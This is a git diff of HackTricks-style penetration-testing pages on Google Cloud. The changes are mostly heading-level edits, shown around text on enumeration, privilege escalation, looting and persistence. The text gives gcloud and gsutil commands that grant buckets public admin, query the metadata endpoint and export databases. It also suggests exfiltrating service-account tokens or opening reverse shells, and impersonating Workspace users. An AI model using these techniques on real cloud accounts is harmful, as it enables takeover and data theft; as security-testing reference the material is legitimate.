* Authorization **using Cloud IAM policies** (covered [here](broken-reference/))
* **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
-### Granting access to management console
+## Granting access to management console
Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
@@ -413,7 +411,7 @@ If you succeeded here, try **accessing the web interface** and exploring from th
This is the **highest level you can assign using the gcloud tool**.
-### Spreading to Workspace via domain-wide delegation of authority
+## Spreading to Workspace via domain-wide delegation of authority
[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.
@@ -425,7 +423,7 @@ However, it's possible to **give** a service account **permissions** over a Work
To create this relation it's needed to **enable it in GCP and also in Workforce**.
-#### Test Workspace access
+### Test Workspace access
To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.
@@ -458,7 +456,7 @@ You can try this script across a range of email addresses to impersonate **vario
If you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild.
-### Looting
+## Looting
Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find some enumeration recommendations for some GCP services, but more could be used so feel free to submit PRs indicating ways to enumerate more services:
@@ -496,13 +494,13 @@ There is a gcloud API endpoint that aims to **list all the resources the accessi
[gcp-looting.md](gcp-looting.md)
{% endcontent-ref %}
-### Persistance
+## Persistance
{% content-ref url="gcp-persistance.md" %}
[gcp-persistance.md](gcp-persistance.md)
{% endcontent-ref %}
-## Capture gcloud, gsutil... network
+# Capture gcloud, gsutil... network
```bash
gcloud config set proxy/address 127.0.0.1
@@ -521,7 +519,7 @@ gcloud config unset auth/disable_ssl_validation
gcloud config unset core/custom_ca_certs_file
```
-## References
+# References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
index 3f39c1d1..d6114317 100644
--- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
+++ b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
@@ -16,22 +16,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation
-### Public Assets Discovery
+# Public Assets Discovery
One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**.
-### Public Resources Brute-Force
+# Public Resources Brute-Force
-#### Buckets, Firebase, Apps & Cloud Functions
+## Buckets, Firebase, Apps & Cloud Functions
* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps.
-#### Buckets
+## Buckets
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
@@ -41,11 +40,11 @@ The following tools can be used to generate variations of the name given and sea
* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute)
-### Privilege Escalation
+# Privilege Escalation
If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access.
-#### Check Permissions
+## Check Permissions
There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.
@@ -53,7 +52,7 @@ However, if your user (potentially belonging to allUsers or allAuthenticatedUser
The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
-#### Escalating
+## Escalating
With the “gsutil” Google Storage CLI program, we can run the following command to grant “allAuthenticatedUsers” access to the “Storage Admin” role, thus **escalating the privileges we were granted** to the bucket:
@@ -63,7 +62,7 @@ gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME
One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the “storage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**.
-### References
+# References
* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
diff --git a/cloud-security/gcp-security/gcp-buckets-enumeration.md b/cloud-security/gcp-security/gcp-buckets-enumeration.md
index 5561e30e..ab56e723 100644
--- a/cloud-security/gcp-security/gcp-buckets-enumeration.md
+++ b/cloud-security/gcp-security/gcp-buckets-enumeration.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Buckets Enumeration
-
Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.
This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
@@ -48,19 +46,19 @@ If you get a permission denied error listing buckets you may still have access t
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
```
-### Search Open Buckets
+## Search Open Buckets
With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_buckets.sh) you can find all the open buckets:
```bash
#!/bin/bash
-#############################
+############################
# Run this tool to find buckets that are open to the public anywhere
# in your GCP organization.
#
# Enjoy!
-#############################
+############################
for proj in $(gcloud projects list --format="get(projectId)"); do
echo "[*] scraping project $proj"
diff --git a/cloud-security/gcp-security/gcp-compute-enumeration.md b/cloud-security/gcp-security/gcp-compute-enumeration.md
index 5b0a9136..3d67e113 100644
--- a/cloud-security/gcp-security/gcp-compute-enumeration.md
+++ b/cloud-security/gcp-security/gcp-compute-enumeration.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Compute Enumeration
-
-## Compute instances
+# Compute instances
It would be interesting if you can **get the zones** the project is using and the **list of all the running instances** and details about each of them.
@@ -33,7 +31,7 @@ The details may include:
```bash
# Get list of zones
-## It's interesting to know which zones are being used
+# It's interesting to know which zones are being used
gcloud compute regions list | grep -E "NAME|[^0]/"
# List compute instances & get info
@@ -53,7 +51,7 @@ For more information about how to **SSH** or **modify the metadata** of an insta
[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
-### Custom Metadata
+## Custom Metadata
Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the `describe` method from a command in the previous section, but it could also be retrieved from the inside of the instance accessing the metadata endpoint.
@@ -67,7 +65,7 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re
-H "Metadata-Flavor: Google"
```
-### Serial Console Logs
+## Serial Console Logs
Compute instances may be **writing output from the OS and BIOS to serial ports**. Serial console logs may expose **sensitive information** from the system logs which low privileged user may not usually see, but with the appropriate IAM permissions you may be able to read them.
@@ -91,7 +89,7 @@ You can then [export](https://cloud.google.com/sdk/gcloud/reference/compute/imag
$ gcloud compute images list --no-standard-images
```
-### Local Privilege Escalation and Pivoting
+## Local Privilege Escalation and Pivoting
If you compromises a compute instance you should also check the actions mentioned in this page:
@@ -99,9 +97,9 @@ If you compromises a compute instance you should also check the actions mentione
[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
-## Images
+# Images
-### Custom Images
+## Custom Images
**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command:
@@ -127,7 +125,7 @@ gcloud compute images list --project windows-cloud --no-standard-images #non-Shi
gcloud compute images list --project gce-uefi-images --no-standard-images #available Shielded VM images, including Windows images
```
-### Custom Instance Templates
+## Custom Instance Templates
An [instance template](https://cloud.google.com/compute/docs/instance-templates/) defines instance properties to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate:
@@ -139,7 +137,7 @@ $ gcloud compute instance-templates list
$ gcloud compute instance-templates describe [TEMPLATE NAME]
```
-## More Enumeration
+# More Enumeration
| Description | Command |
| ---------------------- | --------------------------------------------------------------------------------------------------------- |
diff --git a/cloud-security/gcp-security/gcp-databases-enumeration.md b/cloud-security/gcp-security/gcp-databases-enumeration.md
index b2bfa113..179387ed 100644
--- a/cloud-security/gcp-security/gcp-databases-enumeration.md
+++ b/cloud-security/gcp-security/gcp-databases-enumeration.md
@@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Databases Enumeration
-
Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.
Databases will usually contain interesting information, so it would be completely recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.
As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
-### [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
+## [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance.[Learn more](https://cloud.google.com/sql/docs/)
@@ -39,7 +37,7 @@ gcloud sql backups list --instance [INSTANCE]
gcloud sql export sql gs:///cloudsql/export.sql.gz --database
```
-### [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
+## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
@@ -50,7 +48,7 @@ gcloud spanner databases list --instance [INSTANCE]
gcloud spanner backups list --instance [INSTANCE]
```
-### [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
+## [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
@@ -61,7 +59,7 @@ gcloud bigtable clusters list
gcloud bigtable backups list --instance [INSTANCE]
```
-### [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
+## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore).
@@ -71,11 +69,11 @@ gcloud firestore indexes fields list
gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
```
-### [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
+## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/).
-### Memorystore
+## Memorystore
Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
@@ -87,7 +85,7 @@ gcloud redis instances list --region [region]
gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
```
-### [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool)
+## [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool)
BigQuery is a fully-managed enterprise data warehouse that helps you manage and analyze your data with built-in features like machine learning, geospatial analysis, and business intelligence. BigQuery’s serverless architecture lets you use SQL queries to answer your organization’s biggest questions with zero infrastructure management. BigQuery’s scalable, distributed analysis engine lets you query terabytes in seconds and petabytes in minutes. [Learn more](https://cloud.google.com/bigquery/docs/introduction).
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/README.md b/cloud-security/gcp-security/gcp-interesting-permissions/README.md
index 37053111..da35d9e0 100644
--- a/cloud-security/gcp-security/gcp-interesting-permissions/README.md
+++ b/cloud-security/gcp-security/gcp-interesting-permissions/README.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Abuse GCP Permissions
-
-## Introduction to GCP Privilege Escalation
+# Introduction to GCP Privilege Escalation
GCP, as any other cloud, have some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functions…\
Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\
@@ -41,7 +39,7 @@ It's important to note also that in **GCP Service Accounts are both principals a
The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API.
{% endhint %}
-## Privilege Escalation to Principals
+# Privilege Escalation to Principals
Check all the **known permissions** that will allow you to **escalate privileges over other principals** in:
@@ -49,7 +47,7 @@ Check all the **known permissions** that will allow you to **escalate privileges
[gcp-privesc-to-other-principals.md](gcp-privesc-to-other-principals.md)
{% endcontent-ref %}
-## Privilege Escalation to Resources
+# Privilege Escalation to Resources
Check all the **known permissions** that will allow you to **escalate privileges over other resources** in:
@@ -57,7 +55,7 @@ Check all the **known permissions** that will allow you to **escalate privileges
[gcp-privesc-to-resources.md](gcp-privesc-to-resources.md)
{% endcontent-ref %}
-##
+#
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
index 37b66491..e3685d15 100644
--- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
+++ b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
@@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Privesc to other Principals
-
{% hint style="info" %}
GCP has **hundreds of permissions**. This is just a list containing the **known** ones that could allow you to escalate to other principals.\
If you know about any other permissions not mentioned here, **please send a PR to add it** or let me know and I will add it.
{% endhint %}
-## IAM
+# IAM
-### iam.roles.update (iam.roles.get)
+## iam.roles.update (iam.roles.get)
If you have the mentioned permissions you will be able to update a role assigned to you and give you extra permissions to other resources like:
@@ -36,13 +34,13 @@ gcloud iam roldes update --project --add-permissions
+## iam.serviceAccounts.setIamPolicy
This permission allows to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the “roles/iam.serviceAccountTokenCreator” role over the interesting SA:
@@ -88,13 +86,13 @@ gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.i
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
-### iam.serviceAccounts.actAs
+## iam.serviceAccounts.actAs
This means that as part of creating certain resources, you must “actAs” the Service Account for the call to complete successfully. For example, when starting a new Compute Engine instance with an attached Service Account, you need _iam.serviceAccounts.actAs_ on that Service Account. This is because without that permission, users could escalate permissions with fewer permissions to start with.
**There are multiple individual methods that use \_iam.serviceAccounts.actAs**\_**, so depending on your own permissions, you may only be able to exploit one (or more) of these methods below**. These methods are slightly different in that they **require multiple permissions to exploit, rather than a single permission** like all of the previous methods.
-### iam.serviceAccounts.getOpenIdToken
+## iam.serviceAccounts.getOpenIdToken
This permission can be used to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource.
@@ -124,23 +122,23 @@ Some services that support authentication via this kind of tokens are:
You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py).
-## resourcemanager
+# resourcemanager
-### resourcemanager.organizations.setIamPolicy
+## resourcemanager.organizations.setIamPolicy
Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
-### resourcemanager.folders.setIamPolicy
+## resourcemanager.folders.setIamPolicy
Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
-### resourcemanager.projects.setIamPolicy
+## resourcemanager.projects.setIamPolicy
Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
-## deploymentmanager
+# deploymentmanager
-### deploymentmanager.deployments.create
+## deploymentmanager.deployments.create
This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it.
@@ -148,19 +146,19 @@ You could actually **launch any resource** listed in `gcloud deployment-manager
In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**
-### deploymentmanager.deployments.**update**
+## deploymentmanager.deployments.**update**
This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful)
Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**
-### deploymentmanager.deployments.**setIamPolicy**
+## deploymentmanager.deployments.**setIamPolicy**
This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previos _deploymentmanager.deployments.create_ section.
-## cloudbuild
+# cloudbuild
-### cloudbuild.builds.create
+## cloudbuild.builds.create
With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the powerful cloudbuild Service Account**: `@cloudbuild.gserviceaccount.com` . However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
@@ -169,13 +167,13 @@ You can find the original exploit script [**here on GitHub**](https://github.com
For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
-### cloudbuild.builds.update
+## cloudbuild.builds.update
**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).
-## compute
+# compute
-### compute.projects.setCommonInstanceMetadata
+## compute.projects.setCommonInstanceMetadata
With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
Limitations:
@@ -189,25 +187,25 @@ For more information about how to exploit this permission check:
[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
-### compute.instances.setMetadata
+## compute.instances.setMetadata
This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**.
-### compute.instances.setIamPolicy
+## compute.instances.setIamPolicy
This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
-### **compute.instances.osLogin**
+## **compute.instances.osLogin**
If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance.
-### **compute.instances.osAdminLogin**
+## **compute.instances.osAdminLogin**
If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance.
-## container
+# container
-### container.clusters.get
+## container.clusters.get
This permission allows to **gather credentials for the Kubernetes cluster** using something like:
@@ -221,24 +219,24 @@ Without extra permissions, the credentials are pretty basic as you can **just li
Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet.
{% endhint %}
-### container.clusters.getCredentials
+## container.clusters.getCredentials
Apparently this permission might be useful to gather auth credentials (basic auth method isn't supported anymore by GKE if you use the latest GKE versions).
-### container.roles.escalate/container.clusterRoles.escalate
+## container.roles.escalate/container.clusterRoles.escalate
**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour.
**container.roles.create** and/or **container.roles.update** OR **container.clusterRoles.create** and/or **container.clusterRoles.update** respectively are also **necessary** to perform those privilege escalation actions.\
-### container.roles.bind/container.clusterRoles.bind
+## container.roles.bind/container.clusterRoles.bind
**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour.
**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions.
-### container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update
+## container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update
All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\
For more information check:
@@ -249,30 +247,30 @@ For more information check:
As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used).
-### container.secrets.get, container.secrets.list
+## container.secrets.get, container.secrets.list
As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#listing-secrets), with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them.
-### container.pods.exec
+## container.pods.exec
With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**.
-### container.pods.portForward
+## container.pods.portForward
As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#port-forward), with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.**
-### container.serviceAccounts.createToken
+## container.serviceAccounts.createToken
Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it.
-### container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update
+## container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update
These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\
For more information [**follow this link**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller).
-## storage
+# storage
-### storage.hmacKeys.create
+## storage.hmacKeys.create
There is a feature of Cloud Storage, “interoperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**.
@@ -282,14 +280,14 @@ HMAC keys belonging to your user cannot be accessed through the API and must be
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
-### storage.objects.get
+## storage.objects.get
This permission allows you to **download files stored inside Gcp Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some Gcp services stores their information in buckets:
* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.
* **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
-### storage.objects.create, storage.objects.delete
+## storage.objects.create, storage.objects.delete
In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object\_permissions), you need also `storage.objects.delete` to **modify** an existent object.
@@ -301,15 +299,15 @@ Moreover, several GCP services also **store code inside buckets** that later is
* **GCR (Container Registry)**: The **container images are stored inside buckets**. So if you have write access over them, you could **modify the images** and execute your own code whenever that container is used.
* The bucket used by GCR will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
-### storage.objects.setIamPolicy
+## storage.objects.setIamPolicy
You can give you permission to **abuse any of the previous scenarios of this section**.
-## storage.objects Write permission
+# storage.objects Write permission
If you can modify or add objects in buckets you might be able to escalate your privileges to other resources that are using the bucket to store code that they execute.
-### Composer
+## Composer
**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
@@ -317,7 +315,7 @@ If you can modify or add objects in buckets you might be able to escalate your p
* It stores the **code in a bucket**, therefore, **anyone with write access over that bucket** is going to be able change/add a DGA code (the code Apache Airflow will execute)\
Then, if you have **write access over the bucket Composer is using** to store the code you can **privesc to the SA running in the GKE cluster**.
-## References
+# References
* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md
index dbe76df1..b76686c2 100644
--- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md
+++ b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Privesc to Resources
+# cloudfunctions
-## cloudfunctions
-
-### cloudfunctions.functions.create,iam.serviceAccounts.actAs
+## cloudfunctions.functions.create,iam.serviceAccounts.actAs
For this method, we will be **creating a new Cloud Function with an associated Service Account** that we want to gain access to. Because Cloud Function invocations have **access to the metadata** API, we can request a token directly from it, just like on a Compute Engine instance.
@@ -40,7 +38,7 @@ The script creates the function and waits for it to deploy, then it runs it and
The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).
-### cloudfunctions.functions.update,iam.serviceAccounts.actAs
+## cloudfunctions.functions.update,iam.serviceAccounts.actAs
